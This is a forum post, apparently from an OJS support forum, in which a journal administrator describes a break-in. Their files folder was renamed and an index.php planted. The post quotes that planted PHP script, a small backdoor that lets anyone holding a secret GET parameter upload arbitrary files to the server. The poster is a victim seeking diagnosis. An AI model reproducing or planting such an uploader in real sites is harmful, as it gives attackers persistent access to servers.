Problem: FILE folder hacked.
Hello, yesterday I found it was not possible to upload files to galleys (HTTP error). I was looking for the reason (server error log, php setup… fileopen was enabled). Consequently I found it is not possible to access published articles in present issue and archived issues too. Consequently I looked to the FILE folder and found the problem. The default article folder was renamed. There was some index.php file with the following script:
…
<?php if(isset($_GET['?blankkosong'])) { echo " "; echo ""; if ($_FILES["file"]["upload"] > 0) { echo " " . $_FILES["file"]["upload"] . "
"; } else { echo " " . $_FILES["file"]["name"] . "
"; } if (file_exists("" . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists "; } else { move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]); } } ?>
…
Is it a security problem related to our server or is it a PKP OJS problem (we are using the last version)?
We have the file folder located outside the installation folder.